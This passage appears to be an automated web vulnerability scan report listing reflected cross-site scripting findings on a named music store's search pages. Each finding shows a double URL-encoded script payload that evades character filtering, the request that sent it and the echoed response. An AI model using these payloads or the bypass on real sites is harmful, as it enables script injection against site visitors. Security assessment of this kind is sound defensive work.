Request

GET /search/query/Girls8cdce%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0faee6b0d00&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6odtqrdamccf4kd0dg3v92kkh6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=28885177; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=85691683; expires=Sun, 09-Jan-2011 02:37:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Girls8cdce"><script>alert(1)</script>0faee6b0d00" />
...[SNIP]...

1.144. http://www.insound.com/search/query/Girls&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Girls&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload fd200%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4b864f3d was submitted in the REST URL parameter 3. This input was echoed as fd200</title><script>alert(1)</script>3a4b864f3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Girlsfd200%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4b864f3d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uhi4unatl6co0dh1a1aoost1j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=112971208; expires=Sun, 09-Jan-2011 02:37:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=404524950; expires=Sun, 09-Jan-2011 02:37:15 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Girlsfd200</title><script>alert(1)</script>3a4b864f3d</title>
...[SNIP]...

1.145. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gospel%20Music&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9659a3abc71 was submitted in the REST URL parameter 3. This input was echoed as 9888a"><script>alert(1)</script>9659a3abc71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gospel%20Music9888a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9659a3abc71&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7vq3i77a79i6ov0e9vqf1agja2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=162235946; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=426443927; expires=Sun, 09-Jan-2011 02:40:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Gospel Music9888a"><script>alert(1)</script>9659a3abc71" />
...[SNIP]...

1.146. http://www.insound.com/search/query/Gospel%20Music&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Gospel%20Music&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 22936%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb8e1f91af8 was submitted in the REST URL parameter 3. This input was echoed as 22936</title><script>alert(1)</script>bb8e1f91af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Gospel%20Music22936%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb8e1f91af8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5kpm2mm4pnvibf0hct6jd17ns4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=405021720; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=52611940; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Gospel Music22936</title><script>alert(1)</script>bb8e1f91af8</title>
...[SNIP]...

1.147. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Horsepower%20Productions&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c8120%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70eeac5c4e7 was submitted in the REST URL parameter 3. This input was echoed as c8120</title><script>alert(1)</script>70eeac5c4e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Horsepower%20Productionsc8120%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e70eeac5c4e7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cirdm6in3bvkd2jsg4q7dpefq4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=471953769; expires=Sun, 09-Jan-2011 02:40:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=186815783; expires=Sun, 09-Jan-2011 02:40:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Horsepower Productionsc8120</title><script>alert(1)</script>70eeac5c4e7</title>
...[SNIP]...

1.148. http://www.insound.com/search/query/Horsepower%20Productions&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Horsepower%20Productions&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e734%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c9db3a996 was submitted in the REST URL parameter 3. This input was echoed as 2e734"><script>alert(1)</script>1c9db3a996 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Horsepower%20Productions2e734%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c9db3a996&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=lcid431p60jdufilkht5r2l9l3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=470678726; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=544802520; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Horsepower Productions2e734"><script>alert(1)</script>1c9db3a996" />
...[SNIP]...

1.149. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/How%20to%20Dress%20Well&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da4c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8555fcb64e9 was submitted in the REST URL parameter 3. This input was echoed as da4c9"><script>alert(1)</script>8555fcb64e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/How%20to%20Dress%20Wellda4c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8555fcb64e9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cq3sd721u9jrkhvc5i7cq55up3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=204523635; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=175718969; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="How to Dress Wellda4c9"><script>alert(1)</script>8555fcb64e9" />
...[SNIP]...

1.150. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/How%20to%20Dress%20Well&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4009d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efdf91d36c49 was submitted in the REST URL parameter 3. This input was echoed as 4009d</title><script>alert(1)</script>fdf91d36c49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/How%20to%20Dress%20Well4009d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efdf91d36c49&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9969hhfle9jcu1ni7noog95hi2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=549254036; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=301863147; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>How to Dress Well4009d</title><script>alert(1)</script>fdf91d36c49</title>
...[SNIP]...

1.151. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J%20Mascis&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0dd43e04a81 was submitted in the REST URL parameter 3. This input was echoed as 28bdc"><script>alert(1)</script>0dd43e04a81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J%20Mascis28bdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0dd43e04a81&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4mu5lqis0d138b94suh6s3t2o2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=340898991; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=529060621; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="J Mascis28bdc"><script>alert(1)</script>0dd43e04a81" />
...[SNIP]...

1.152. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J%20Mascis&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 75c6a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee139c9dfaec was submitted in the REST URL parameter 3. This input was echoed as 75c6a</title><script>alert(1)</script>e139c9dfaec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J%20Mascis75c6a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee139c9dfaec&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=dg6lq0r0mlg63comojmom3c3a2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=220202153; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=91769978; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>J Mascis75c6a</title><script>alert(1)</script>e139c9dfaec</title>
...[SNIP]...

1.153. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J.%20Cole&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31451%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b83cff01bc was submitted in the REST URL parameter 3. This input was echoed as 31451"><script>alert(1)</script>0b83cff01bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J.%20Cole31451%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b83cff01bc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=8vp5dbl4i17f8mi2pj85nk8763; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=299089229; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=557180658; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="J. Cole31451"><script>alert(1)</script>0b83cff01bc" />
...[SNIP]...

1.154. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J.%20Cole&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 716c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e23fb958d2 was submitted in the REST URL parameter 3. This input was echoed as 716c6</title><script>alert(1)</script>5e23fb958d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J.%20Cole716c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e23fb958d2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=42d2nmofrhktl9vauf0oik97e5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=10890112; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=456705785; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>J. Cole716c6</title><script>alert(1)</script>5e23fb958d2</title>
...[SNIP]...

1.155. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Jana%20Hunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e67c8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad4d42f534 was submitted in the REST URL parameter 3. This input was echoed as e67c8</title><script>alert(1)</script>aad4d42f534 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

